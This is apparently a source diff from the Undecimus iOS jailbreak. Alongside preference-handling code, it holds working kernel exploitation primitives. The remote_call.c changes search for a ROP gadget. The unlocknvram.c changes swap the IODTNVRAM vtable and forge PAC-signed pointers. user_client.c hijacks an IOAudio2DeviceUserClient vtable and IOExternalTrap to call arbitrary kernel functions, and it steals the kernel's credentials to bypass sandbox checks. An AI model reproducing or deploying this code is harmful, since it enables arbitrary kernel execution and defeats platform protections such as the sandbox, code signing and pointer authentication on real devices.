+//  Created by Pwn20wnd on 5/3/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#include "prefs.h"
+#include <Foundation/Foundation.h>
+#include <common.h>
+#include "utils.h"
+
+@interface NSUserDefaults ()
+- (id)objectForKey:(id)arg1 inDomain:(id)arg2;
+- (void)setObject:(id)arg1 forKey:(id)arg2 inDomain:(id)arg3;
+@end
+
+static NSUserDefaults *userDefaults = nil;
+static NSString *prefsFile = nil;
+
+prefs_t *new_prefs() {
+    prefs_t *prefs = (prefs_t *)malloc(sizeof(prefs_t));
+    assert(prefs != NULL);
+    bzero(prefs, sizeof(prefs_t));
+    return prefs;
+}
+
+prefs_t *copy_prefs() {
+    prefs_t *prefs = new_prefs();
+    load_prefs(prefs);
+    return prefs;
+}
+
+void release_prefs(prefs_t **prefs) {
+    SafeFreeNULL(*prefs);
+}
+
+bool load_prefs(prefs_t *prefs) {
+    if (prefs == NULL) {
+        return false;
+    }
+    prefs->load_tweaks = (bool)[[userDefaults objectForKey:@K_TWEAK_INJECTION inDomain:prefsFile] boolValue];
+    prefs->load_daemons = (bool)[[userDefaults objectForKey:@K_LOAD_DAEMONS inDomain:prefsFile] boolValue];
+    prefs->dump_apticket = (bool)[[userDefaults objectForKey:@K_DUMP_APTICKET inDomain:prefsFile] boolValue];
+    prefs->run_uicache = (bool)[[userDefaults objectForKey:@K_REFRESH_ICON_CACHE inDomain:prefsFile] boolValue];
+    prefs->boot_nonce = (const char *)[[userDefaults objectForKey:@K_BOOT_NONCE inDomain:prefsFile] UTF8String];
+    prefs->disable_auto_updates = (bool)[[userDefaults objectForKey:@K_DISABLE_AUTO_UPDATES inDomain:prefsFile] boolValue];
+    prefs->disable_app_revokes = (bool)[[userDefaults objectForKey:@K_DISABLE_APP_REVOKES inDomain:prefsFile] boolValue];
+    prefs->overwrite_boot_nonce = (bool)[[userDefaults objectForKey:@K_OVERWRITE_BOOT_NONCE inDomain:prefsFile] boolValue];
+    prefs->export_kernel_task_port = (bool)[[userDefaults objectForKey:@K_EXPORT_KERNEL_TASK_PORT inDomain:prefsFile] boolValue];
+    prefs->restore_rootfs = (bool)[[userDefaults objectForKey:@K_RESTORE_ROOTFS inDomain:prefsFile] boolValue];
+    prefs->increase_memory_limit = (bool)[[userDefaults objectForKey:@K_INCREASE_MEMORY_LIMIT inDomain:prefsFile] boolValue];
+    prefs->ecid = (const char *)[[userDefaults objectForKey:@K_ECID inDomain:prefsFile] UTF8String];
+    prefs->install_cydia = (bool)[[userDefaults objectForKey:@K_INSTALL_CYDIA inDomain:prefsFile] boolValue];
+    prefs->install_openssh = (bool)[[userDefaults objectForKey:@K_INSTALL_OPENSSH inDomain:prefsFile] boolValue];
+    prefs->reload_system_daemons = (bool)[[userDefaults objectForKey:@K_RELOAD_SYSTEM_DAEMONS inDomain:prefsFile] boolValue];
+    prefs->reset_cydia_cache = (bool)[[userDefaults objectForKey:@K_RESET_CYDIA_CACHE inDomain:prefsFile] boolValue];
+    prefs->ssh_only = (bool)[[userDefaults objectForKey:@K_SSH_ONLY inDomain:prefsFile] boolValue];
+    prefs->enable_get_task_allow = (bool)[[userDefaults objectForKey:@K_ENABLE_GET_TASK_ALLOW inDomain:prefsFile]boolValue];
+    prefs->set_cs_debugged = (bool)[[userDefaults objectForKey:@K_SET_CS_DEBUGGED inDomain:prefsFile] boolValue];
+    prefs->exploit = (int)[[userDefaults objectForKey:@K_EXPLOIT inDomain:prefsFile] intValue];
+    prefs->hide_log_window = (bool)[[userDefaults objectForKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile] boolValue];
+    return true;
+}
+
+bool set_prefs(prefs_t *prefs) {
+    if (prefs == NULL) {
+        return false;
+    }
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->load_tweaks] forKey:@K_TWEAK_INJECTION inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->load_daemons] forKey:@K_LOAD_DAEMONS inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->dump_apticket] forKey:@K_DUMP_APTICKET inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->run_uicache] forKey:@K_REFRESH_ICON_CACHE inDomain:prefsFile];
+    [userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->boot_nonce] forKey:@K_BOOT_NONCE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->disable_auto_updates] forKey:@K_DISABLE_AUTO_UPDATES inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->disable_app_revokes] forKey:@K_DISABLE_APP_REVOKES inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->overwrite_boot_nonce] forKey:@K_OVERWRITE_BOOT_NONCE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->export_kernel_task_port] forKey:@K_EXPORT_KERNEL_TASK_PORT inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->restore_rootfs] forKey:@K_RESTORE_ROOTFS inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->increase_memory_limit] forKey:@K_INCREASE_MEMORY_LIMIT inDomain:prefsFile];
+    [userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->ecid] forKey:@K_ECID inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->install_cydia] forKey:@K_INSTALL_CYDIA inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->install_openssh] forKey:@K_INSTALL_OPENSSH inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->reload_system_daemons] forKey:@K_RELOAD_SYSTEM_DAEMONS inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->reset_cydia_cache] forKey:@K_RESET_CYDIA_CACHE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->ssh_only] forKey:@K_SSH_ONLY inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->enable_get_task_allow] forKey:@K_ENABLE_GET_TASK_ALLOW inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->set_cs_debugged] forKey:@K_SET_CS_DEBUGGED inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithInt:(int)prefs->exploit] forKey:@K_EXPLOIT inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->hide_log_window] forKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile];
+    [userDefaults synchronize];
+    return true;
+}
+
+void register_default_prefs() {
+    NSMutableDictionary *defaults = [NSMutableDictionary new];
+    defaults[@K_TWEAK_INJECTION] = @YES;
+    defaults[@K_LOAD_DAEMONS] = @YES;
+    defaults[@K_DUMP_APTICKET] = @YES;
+    defaults[@K_REFRESH_ICON_CACHE] = @NO;
+    defaults[@K_BOOT_NONCE] = @"0x1111111111111111";
+    defaults[@K_DISABLE_AUTO_UPDATES] = @YES;
+    defaults[@K_DISABLE_APP_REVOKES] = @YES;
+    defaults[@K_OVERWRITE_BOOT_NONCE] = @YES;
+    defaults[@K_EXPORT_KERNEL_TASK_PORT] = @NO;
+    defaults[@K_RESTORE_ROOTFS] = @NO;
+    defaults[@K_INCREASE_MEMORY_LIMIT] = @NO;
+    defaults[@K_ECID] = @"0x0";
+    defaults[@K_INSTALL_CYDIA] = @NO;
+    defaults[@K_INSTALL_OPENSSH] = @NO;
+    defaults[@K_RELOAD_SYSTEM_DAEMONS] = @YES;
+    defaults[@K_SSH_ONLY] = @NO;
+    defaults[@K_ENABLE_GET_TASK_ALLOW] = @NO;
+    defaults[@K_SET_CS_DEBUGGED] = @NO;
+    defaults[@K_HIDE_LOG_WINDOW] = @NO;
+    defaults[@K_EXPLOIT] = [NSNumber numberWithInteger:recommendedJailbreakSupport()];
+    [userDefaults registerDefaults:defaults];
+}
+
+void repair_prefs() {
+    prefs_t *prefs = copy_prefs();
+    if (!supportsExploit(prefs->exploit)) prefs->exploit = (int)recommendedJailbreakSupport();
+    set_prefs(prefs);
+    release_prefs(&prefs);
+}
+
+void reset_prefs() {
+    [userDefaults removePersistentDomainForName:[[NSBundle mainBundle] bundleIdentifier]];
+}
+__attribute__((constructor))
+static void ctor() {
+    userDefaults = [NSUserDefaults standardUserDefaults];
+    prefsFile = [NSString stringWithFormat:@"%@/Library/Preferences/%@.plist", NSHomeDirectory(), [[NSBundle mainBundle] bundleIdentifier]];
+}

Undecimus/source/remote_call.c

@@ -10,14 +10,40 @@
 #include <mach/mach_traps.h>
 #include <mach/task.h>
 
-extern uint64_t
-find_blr_x19_gadget(void);
-
 #include "remote_call.h"
 #include "remote_memory.h"
 
 #include <common.h>
 
+#if !__arm64e__
+static uint64_t find_gadget_candidate(char **alternatives, size_t gadget_length) {
+    auto const haystack_start = (void *)atoi; // will do...
+    auto haystack_size = 100*1024*1024; // likewise...
+    
+    for (char *candidate = *alternatives; candidate != NULL; alternatives++) {
+        void *found_at = memmem(haystack_start, haystack_size, candidate, gadget_length);
+        if (found_at != NULL){
+            LOG("found at: %llx", (uint64_t)found_at);
+            return (uint64_t)found_at;
+        }
+    }
+    return 0;
+}
+
+static uint64_t blr_x19_addr = 0;
+static uint64_t find_blr_x19_gadget()
+{
+    if (blr_x19_addr != 0){
+        return blr_x19_addr;
+    }
+    auto const blr_x19 = "\x60\x02\x3f\xd6";
+    char* candidates[] = {blr_x19, NULL};
+    blr_x19_addr = find_gadget_candidate(candidates, 4);
+    return blr_x19_addr;
+}
+
+#endif
+
 // no support for non-register args
 #define MAX_REMOTE_ARGS 8
 
@@ -28,6 +54,9 @@ _pthread_set_self(
 
 uint64_t call_remote(mach_port_t task_port, void* fptr, int n_params, ...)
 {
+#if __arm64e__
+    return 0;
+#else
     if (n_params > MAX_REMOTE_ARGS || n_params < 0) {
         LOG("unsupported number of arguments to remote function (%d)", n_params);
         return 0;
@@ -221,11 +250,15 @@ uint64_t call_remote(mach_port_t task_port, void* fptr, int n_params, ...)
     remote_free(task_port, remote_stack_base, remote_stack_size);
 
     return ret_val;
+#endif
 }
 
 // thread should be suspended already; will return suspended
 uint64_t thread_call_remote(mach_port_t thread_port, void* fptr, int n_params, ...)
 {
+#if __arm64e__
+    return 0;
+#else
     if (n_params > MAX_REMOTE_ARGS || n_params < 0) {
         LOG("unsupported number of arguments to remote function (%d)", n_params);
         return 0;
@@ -363,4 +396,5 @@ uint64_t thread_call_remote(mach_port_t thread_port, void* fptr, int n_params, .
     uint64_t ret_val = fcall_thread_state.__x[0];
 
     return ret_val;
+#endif
 }

Undecimus/source/unlocknvram.c

@@ -5,23 +5,26 @@
 //  2) Have tfp0 / kernel read|write|alloc
 //  3) Can leak kernel address of mach port
 // then we can fake vtable on IODTNVRAM object
-// async_wake satisfies those requirements
-// however, I wasn't able to actually set or get ANY nvram variable
-// not even userread/userwrite
-// Guess sandboxing won't let to access nvram
 
 #include <stdlib.h>
 #include <CoreFoundation/CoreFoundation.h>
 #include <iokit.h>
 #include <common.h>
 #include "KernelUtilities.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelMemory.h"
 #include "find_port.h"
+#include "pac.h"
+#include "kernel_call.h"
+#include "kc_parameters.h"
 
-// from vtable start in bytes
-unsigned VTB_IODTNVRAM__SEARCHNVRAMPROPERTY = 0x590;
-unsigned VTB_IODTNVRAM__GETOFVARIABLEPERM   = 0x558;
+static const size_t max_vtable_size = 0x1000;
+static const size_t kernel_buffer_size = 0x4000;
+
+// it always returns false
+static const uint64_t searchNVRAMProperty = 0x590;
+// 0 corresponds to root only
+static const uint64_t getOFVariablePerm = 0x558;
 
 // convertPropToObject calls getOFVariableType
 // open convertPropToObject, look for first vtable call -- that'd be getOFVariableType
@@ -47,7 +50,9 @@ uint64_t get_iodtnvram_obj(void) {
     return IODTNVRAMObj;
 }
 
-uint64_t orig_vtable = -1;
+uint64_t orig_vtable = 0;
+uint64_t fake_vtable = 0;
+uint64_t fake_vtable_xpac = 0;
 
 int unlocknvram(void) {
     uint64_t obj = get_iodtnvram_obj();
@@ -56,45 +61,53 @@ int unlocknvram(void) {
         return 1;
     }
 
-    uint64_t vtable_start = ReadKernel64(obj);
-
-    orig_vtable = vtable_start;
-
-    uint64_t vtable_end = vtable_start;
-    // Is vtable really guaranteed to end with 0 or was it just a coincidence?..
-    // should we just use some max value instead?
-    while (ReadKernel64(vtable_end) != 0) vtable_end += sizeof(uint64_t);
-
-    uint32_t vtable_len = (uint32_t) (vtable_end - vtable_start);
-
-    // copy vtable to userspace
-    uint64_t *buf = calloc(1, vtable_len);
-    rkbuffer(vtable_start, buf, vtable_len);
-
-    LOG("IODTNVRAM vtable: 0x%llx - 0x%llx", vtable_start, vtable_end);
-
-    for (int i = 0; i != vtable_len; i += sizeof(uint64_t)) {
-        LOG("\t[0x%03x]: 0x%llx", i, buf[i/sizeof(uint64_t)]);
-    }
-
+    orig_vtable = ReadKernel64(obj);
+    uint64_t vtable_xpac = kernel_xpacd(orig_vtable);
+    
+    uint64_t *buf = calloc(1, max_vtable_size);
+    kread(vtable_xpac, buf, max_vtable_size);
+    
     // alter it
-    buf[VTB_IODTNVRAM__GETOFVARIABLEPERM / sizeof(uint64_t)] = \
-        buf[VTB_IODTNVRAM__SEARCHNVRAMPROPERTY / sizeof(uint64_t)];
+    buf[getOFVariablePerm / sizeof(uint64_t)] = \
+        kernel_xpaci(buf[searchNVRAMProperty / sizeof(uint64_t)]);
 
-    // allocate buffer in kernel and copy it back
-    uint64_t fake_vtable = kmem_alloc_wired(vtable_len);
-    wkbuffer(fake_vtable, buf, vtable_len);
+    // allocate buffer in kernel
+    fake_vtable_xpac = kmem_alloc_wired(kernel_buffer_size);
+    
+    // Forge the pacia pointers to the virtual methods.
+    size_t count = 0;
+    for (; count < max_vtable_size / sizeof(*buf); count++) {
+        uint64_t vmethod = buf[count];
+        if (vmethod == 0) {
+            break;
+        }
+#if __arm64e__
+        assert(count < VTABLE_PAC_CODES(IODTNVRAM).count);
+        vmethod = kernel_xpaci(vmethod);
+        uint64_t vmethod_address = fake_vtable_xpac + count * sizeof(*buf);
+        buf[count] = kernel_forge_pacia_with_type(vmethod, vmethod_address,
+                                                  VTABLE_PAC_CODES(IODTNVRAM).codes[count]);
+#endif // __arm64e__
+    }
+    
+    // and copy it back
+    kwrite(fake_vtable_xpac, buf, count*sizeof(*buf));
+#if __arm64e__
+    fake_vtable = kernel_forge_pacda(fake_vtable_xpac, 0);
+#else
+    fake_vtable = fake_vtable_xpac;
+#endif
 
     // replace vtable on IODTNVRAM object
     WriteKernel64(obj, fake_vtable);
 
-    free(buf);
+    SafeFreeNULL(buf);
     LOG("Unlocked nvram");
     return 0;
 }
 
 int locknvram(void) {
-    if (orig_vtable == -1) {
+    if (orig_vtable == 0 || fake_vtable_xpac == 0) {
         LOG("Trying to lock nvram, but didnt unlock first");
         return -1;
     }
@@ -106,6 +119,7 @@ int locknvram(void) {
     }
     
     WriteKernel64(obj, orig_vtable);
+    kmem_free(fake_vtable_xpac, kernel_buffer_size);
 
     LOG("Locked nvram");
     return 0;

Undecimus/source/user_client.c

@@ -0,0 +1,358 @@
+/*
+ * kernel_call/user_client.c
+ * Brandon Azad
+ */
+#include "user_client.h"
+
+#include <assert.h>
+
+#include "IOKitLib.h"
+#include "kernel_call.h"
+#include "kc_parameters.h"
+#include "pac.h"
+#include "kernel_memory.h"
+#include "kernel_slide.h"
+#include "log.h"
+#include "mach_vm.h"
+#include "parameters.h"
+#include "common.h"
+
+// ---- Global variables --------------------------------------------------------------------------
+
+// The connection to the user client.
+static io_connect_t connection;
+
+// The address of the user client.
+static uint64_t user_client;
+
+// The address of the IOExternalTrap.
+static uint64_t trap;
+
+// The size of our kernel buffer.
+static const size_t kernel_buffer_size = 0x4000;
+
+// The address of our kernel buffer.
+static uint64_t kernel_buffer;
+
+// The maximum size of the vtable.
+static const size_t max_vtable_size = 0x1000;
+
+// The user client's original vtable pointer.
+static uint64_t original_vtable;
+
+// ---- Stage 1 -----------------------------------------------------------------------------------
+
+/*
+ * kernel_get_proc_for_task
+ *
+ * Description:
+ * 	Get the proc struct for a task.
+ */
+static uint64_t
+kernel_get_proc_for_task(uint64_t task) {
+	return kernel_read64(task + OFFSET(task, bsd_info));
+}
+
+/*
+ * stage0_create_user_client
+ *
+ * Description:
+ * 	Create a connection to an IOAudio2DeviceUserClient object.
+ */
+static bool
+stage0_create_user_client() {
+	bool success = false;
+	// First get a handle to some IOAudio2Device driver.
+	io_iterator_t iter;
+	kern_return_t kr = IOServiceGetMatchingServices(
+			kIOMasterPortDefault,
+			IOServiceMatching("IOAudio2Device"),
+			&iter);
+	if (iter == MACH_PORT_NULL) {
+		ERROR("could not find services matching %s", "IOAudio2Device");
+		goto fail_0;
+	}
+	// Now try to open each service in turn.
+	for (;;) {
+		// Get the service.
+		mach_port_t IOAudio2Device = IOIteratorNext(iter);
+		if (IOAudio2Device == MACH_PORT_NULL) {
+			ERROR("could not open any %s", "IOAudio2Device");
+			break;
+		}
+		// Now open a connection to it.
+		kr = IOServiceOpen(
+				IOAudio2Device,
+				mach_task_self(),
+				0,
+				&connection);
+		IOObjectRelease(IOAudio2Device);
+		if (kr == KERN_SUCCESS) {
+			success = true;
+			break;
+		}
+		DEBUG_TRACE(2, "%s returned 0x%x: %s", "IOServiceOpen", kr, mach_error_string(kr));
+		DEBUG_TRACE(2, "could not open %s", "IOAudio2DeviceUserClient");
+	}
+fail_1:
+	IOObjectRelease(iter);
+fail_0:
+	return success;
+}
+
+/*
+ * stage0_find_user_client_trap
+ *
+ * Description:
+ * 	Get the address of the IOAudio2DeviceUserClient and its IOExternalTrap.
+ */
+static void
+stage0_find_user_client_trap() {
+	assert(MACH_PORT_VALID(connection));
+	// Get the address of the port representing the IOAudio2DeviceUserClient.
+	uint64_t user_client_port;
+	bool ok = kernel_ipc_port_lookup(current_task, connection, &user_client_port, NULL);
+	assert(ok);
+	// Get the address of the IOAudio2DeviceUserClient.
+	user_client = kernel_read64(user_client_port + OFFSET(ipc_port, ip_kobject));
+	// Get the address of the IOExternalTrap.
+	trap = kernel_read64(user_client + OFFSET(IOAudio2DeviceUserClient, traps));
+	DEBUG_TRACE(2, "%s is at 0x%016llx", "IOExternalTrap", trap);
+}
+
+/*
+ * stage0_allocate_kernel_buffer
+ *
+ * Description:
+ * 	Allocate a buffer in kernel memory.
+ */
+static bool
+stage0_allocate_kernel_buffer() {
+	kern_return_t kr = mach_vm_allocate(kernel_task_port, &kernel_buffer,
+			kernel_buffer_size, VM_FLAGS_ANYWHERE);
+	if (kr != KERN_SUCCESS) {
+		ERROR("%s returned %d: %s", "mach_vm_allocate", kr, mach_error_string(kr));
+		ERROR("could not allocate kernel buffer");
+		return false;
+	}
+	DEBUG_TRACE(1, "allocated kernel buffer at 0x%016llx", kernel_buffer);
+	return true;
+}
+
+// ---- Stage 3 -----------------------------------------------------------------------------------
+
+/*
+ * kernel_read_vtable_method
+ *
+ * Description:
+ * 	Read the virtual method pointer at the specified index in the vtable.
+ */
+static uint64_t
+kernel_read_vtable_method(uint64_t vtable, size_t index) {
+	uint64_t vmethod_address = vtable + index * sizeof(uint64_t);
+	return kernel_read64(vmethod_address);
+}
+
+/*
+ * stage2_copyout_user_client_vtable
+ *
+ * Description:
+ * 	Copy out the user client's vtable to userspace. The returned array must be freed when no
+ * 	longer needed.
+ */
+static uint64_t *
+stage2_copyout_user_client_vtable() {
+	// Get the address of the vtable.
+	original_vtable = kernel_read64(user_client);
+	uint64_t original_vtable_xpac = kernel_xpacd(original_vtable);
+	// Read the contents of the vtable to local buffer.
+	uint64_t *vtable_contents = malloc(max_vtable_size);
+	assert(vtable_contents != NULL);
+	kernel_read(original_vtable_xpac, vtable_contents, max_vtable_size);
+	return vtable_contents;
+}
+
+/*
+ * stage2_patch_user_client_vtable
+ *
+ * Description:
+ * 	Patch the contents of the user client's vtable in preparation for stage 3.
+ */
+static size_t
+stage2_patch_user_client_vtable(uint64_t *vtable) {
+	// Replace the original vtable's IOUserClient::getTargetAndTrapForIndex() method with the
+	// original version (which calls IOUserClient::getExternalTrapForIndex()).
+	uint64_t IOUserClient__getTargetAndTrapForIndex = kernel_read_vtable_method(
+			ADDRESS(IOUserClient__vtable),
+			VTABLE_INDEX(IOUserClient, getTargetAndTrapForIndex));
+	vtable[VTABLE_INDEX(IOUserClient, getTargetAndTrapForIndex)]
+		= IOUserClient__getTargetAndTrapForIndex;
+	// Replace the original vtable's IOUserClient::getExternalTrapForIndex() method with
+	// IORegistryEntry::getRegistryEntryID().
+	vtable[VTABLE_INDEX(IOUserClient, getExternalTrapForIndex)] =
+		ADDRESS(IORegistryEntry__getRegistryEntryID);
+	// Forge the pacia pointers to the virtual methods.
+	size_t count = 0;
+	for (; count < max_vtable_size / sizeof(*vtable); count++) {
+		uint64_t vmethod = vtable[count];
+		if (vmethod == 0) {
+			break;
+		}
+#if __arm64e__
+		assert(count < VTABLE_PAC_CODES(IOAudio2DeviceUserClient).count);
+		vmethod = kernel_xpaci(vmethod);
+		uint64_t vmethod_address = kernel_buffer + count * sizeof(*vtable);
+		vtable[count] = kernel_forge_pacia_with_type(vmethod, vmethod_address,
+				VTABLE_PAC_CODES(IOAudio2DeviceUserClient).codes[count]);
+#endif // __arm64e__
+	}
+	return count;
+}
+
+/*
+ * stage2_patch_user_client
+ *
+ * Description:
+ * 	Patch the user client in preparation for stage 3.
+ */
+static void
+stage2_patch_user_client(uint64_t *vtable, size_t count) {
+	// Write the vtable to the kernel buffer.
+	kernel_write(kernel_buffer, vtable, count * sizeof(*vtable));
+	// Overwrite the user client's registry entry ID to point to the IOExternalTrap.
+	uint64_t reserved_field = user_client + OFFSET(IORegistryEntry, reserved);
+	uint64_t reserved = kernel_read64(reserved_field);
+	uint64_t id_field = reserved + OFFSET(IORegistryEntry__ExpansionData, fRegistryEntryID);
+	kernel_write64(id_field, trap);
+	// Forge the pacdza pointer to the vtable.
+	uint64_t vtable_pointer = kernel_forge_pacda(kernel_buffer, 0);
+	// Overwrite the user client's vtable pointer with the forged pointer to our fake vtable.
+	kernel_write64(user_client, vtable_pointer);
+}
+
+/*
+ * stage2_unpatch_user_client
+ *
+ * Description:
+ * 	Undo the patches to the user client.
+ */
+static void
+stage2_unpatch_user_client() {
+	// Write the original vtable pointer back to the user client.
+	kernel_write64(user_client, original_vtable);
+}
+
+// ---- API ---------------------------------------------------------------------------------------
+
+bool
+stage1_kernel_call_init() {
+	// Initialize the parameters. We do this first to fail early.
+	bool ok = kernel_call_parameters_init();
+	if (!ok) {
+		return false;
+	}
+	// Create the IOAudio2DeviceUserClient.
+	ok = stage0_create_user_client();
+	if (!ok) {
+		ERROR("could not create %s", "IOAudio2DeviceUserClient");
+		return false;
+	}
+	// Find the IOAudio2DeviceUserClient's IOExternalTrap.
+	stage0_find_user_client_trap();
+	// Allocate the kernel buffer.
+	ok = stage0_allocate_kernel_buffer();
+	if (!ok) {
+		return false;
+	}
+	return true;
+}
+
+void
+stage1_kernel_call_deinit() {
+	if (trap != 0) {
+		// Zero out the trap.
+		uint8_t trap_data[SIZE(IOExternalTrap)];
+		memset(trap_data, 0, SIZE(IOExternalTrap));
+		kernel_write(trap, trap_data, SIZE(IOExternalTrap));
+		trap = 0;
+	}
+	if (kernel_buffer != 0) {
+		// Deallocate our kernel buffer.
+		mach_vm_deallocate(mach_task_self(), kernel_buffer, kernel_buffer_size);
+		kernel_buffer = 0;
+	}
+	if (MACH_PORT_VALID(connection)) {
+		// Close the connection.
+		IOServiceClose(connection);
+		connection = MACH_PORT_NULL;
+	}
+}
+
+uint64_t
+stage1_get_kernel_buffer() {
+	assert(kernel_buffer_size >= 0x2000);
+	return kernel_buffer + kernel_buffer_size - 0x1000;
+}
+
+uint32_t
+stage1_kernel_call_7v(uint64_t function, size_t argument_count, const uint64_t arguments[]) {
+	assert(function != 0);
+	assert(argument_count <= 7);
+	assert(argument_count == 0 || arguments[0] != 0);
+	assert(MACH_PORT_VALID(connection) && trap != 0);
+	// Get exactly 7 arguments. Initialize args[0] to 1 in case there are no arguments.
+	uint64_t args[7] = { 1 };
+	for (size_t i = 0; i < argument_count && i < 7; i++) {
+		args[i] = arguments[i];
+	}
+	// Initialize the IOExternalTrap for this call.
+	uint8_t trap_data[SIZE(IOExternalTrap)];
+	FIELD(trap_data, IOExternalTrap, object,   uint64_t) = args[0];
+	FIELD(trap_data, IOExternalTrap, function, uint64_t) = function;
+	FIELD(trap_data, IOExternalTrap, offset,   uint64_t) = 0;
+	kernel_write(trap, trap_data, SIZE(IOExternalTrap));
+	// Perform the function call.
+	uint32_t result = IOConnectTrap6(connection, 0,
+			args[1], args[2], args[3], args[4], args[5], args[6]);
+	return result;
+}
+
+bool
+stage3_kernel_call_init() {
+	uint64_t *vtable = stage2_copyout_user_client_vtable();
+	size_t count = stage2_patch_user_client_vtable(vtable);
+	stage2_patch_user_client(vtable, count);
+	SafeFreeNULL(vtable);
+	return true;
+}
+
+void
+stage3_kernel_call_deinit() {
+	if (original_vtable != 0) {
+		stage2_unpatch_user_client();
+		original_vtable = 0;
+	}
+}
+
+uint32_t
+kernel_call_7v(uint64_t function, size_t argument_count, const uint64_t arguments[]) {
+	return stage2_kernel_call_7v(function, argument_count, arguments);
+}
+
+void
+assume_kernel_credentials(uint64_t *ucred_field, uint64_t *ucred) {
+  uint64_t proc_self = kernel_get_proc_for_task(current_task);
+  uint64_t kernel_proc = kernel_get_proc_for_task(kernel_task);
+  uint64_t proc_self_ucred_field = proc_self + OFFSET(proc, p_ucred);
+  uint64_t kernel_proc_ucred_field = kernel_proc + OFFSET(proc, p_ucred);
+  uint64_t proc_self_ucred = kernel_read64(proc_self_ucred_field);
+  uint64_t kernel_proc_ucred = kernel_read64(kernel_proc_ucred_field);
+  kernel_write64(proc_self_ucred_field, kernel_proc_ucred);
+  *ucred_field = proc_self_ucred_field;
+  *ucred = proc_self_ucred;
+}
+
+void
+restore_credentials(uint64_t ucred_field, uint64_t ucred) {
+  kernel_write64(ucred_field, ucred);
+}

Undecimus/source/user_client.h

@@ -0,0 +1,91 @@
+/*
+ * kernel_call/user_client.h
+ * Brandon Azad
+ */
+#ifndef VOUCHER_SWAP__KERNEL_CALL__USER_CLIENT_H_
+#define VOUCHER_SWAP__KERNEL_CALL__USER_CLIENT_H_
+
+#include <stdbool.h>
+#include <stddef.h>
+#include <stdint.h>
+
+/*
+ * stage1_kernel_call_init
+ *
+ * Description:
+ * 	Initialize stage 1 of kernel function calling.
+ *
+ * Initializes:
+ * 	kernel_call_parameters_init()
+ * 	stage1_kernel_call_7v()
+ */
+bool stage1_kernel_call_init(void);
+
+/*
+ * stage1_kernel_call_deinit
+ *
+ * Description:
+ * 	Deinitialize stage 1 of kernel function calling.
+ */
+void stage1_kernel_call_deinit(void);
+
+/*
+ * stage1_get_kernel_buffer
+ *
+ * Description:
+ * 	Get the address of a 0x1000-byte scratch space in kernel memory that can be used by other
+ * 	stages.
+ */
+uint64_t stage1_get_kernel_buffer(void);
+
+/*
+ * stage1_kernel_call_7v
+ *
+ * Description:
+ * 	Call a kernel function using our stage 1 execute primitive.
+ *
+ * Restrictions:
+ * 	At most 7 arguments can be passed.
+ * 	The return value is truncated to 32 bits.
+ * 	At stage 1, only arguments X1 - X6 are controlled.
+ * 	The function pointer must already have a PAC signature.
+ */
+uint32_t stage1_kernel_call_7v(uint64_t function,
+		size_t argument_count, const uint64_t arguments[]);
+
+/*
+ * stage3_kernel_call_init
+ *
+ * Description:
+ * 	Initialize stage 3 of kernel function calling.
+ *
+ * Initializes:
+ * 	kernel_call_7v()
+ */
+bool stage3_kernel_call_init(void);
+
+/*
+ * stage3_kernel_call_deinit
+ *
+ * Description:
+ * 	Deinitialize stage 3 of kernel function calling.
+ */
+void stage3_kernel_call_deinit(void);
+
+/*
+ * assume_kernel_credentials
+ *
+ * Description:
+ *   Set this process's credentials to the kernel's credentials so that we can bypass sandbox
+ *   checks.
+ */
+void assume_kernel_credentials(uint64_t *ucred_field, uint64_t *ucred);
+/*
+ * restore_credentials
+ *
+ * Description:
+ *   Restore this process's credentials after calling assume_kernel_credentials().
+ */
+void restore_credentials(uint64_t ucred_field, uint64_t ucred);
+
+#endif

Undecimus/source/utils.h

@@ -14,6 +14,8 @@
 
 #define system(x) _system(x)
 extern int logfd;
+extern bool injectedToTrustCache;
+extern NSMutableArray *toInjectToTrustCache;
 
 #define DEFAULT_VERSION_STRING "Hacked"
 #define SLIDE_FILE "/var/tmp/slide.txt"
@@ -23,10 +25,11 @@ typedef enum {
     multi_path_exploit,
     async_wake_exploit,
     voucher_swap_exploit,
-    v1ntex_exploit,
-    v3ntex_exploit,
+    mach_swap_exploit,
+    mach_swap_2_exploit,
     deja_xnu_exploit,
-    necp_exploit
+    necp_exploit,
+    kalloc_crash
 } exploit_t;
 
 enum hashtype {
@@ -35,6 +38,16 @@ enum hashtype {
 };
 int proc_pidpath(pid_t pid, void *buffer, uint32_t buffersize);
 
+@interface LSApplicationWorkspace : NSObject
++ (id) defaultWorkspace;
+- (BOOL) registerApplication:(id)application;
+- (BOOL) unregisterApplication:(id)application;
+- (BOOL) invalidateIconCache:(id)bundle;
+- (BOOL) registerApplicationDictionary:(id)application;
+- (BOOL) installApplication:(id)application withOptions:(id)options;
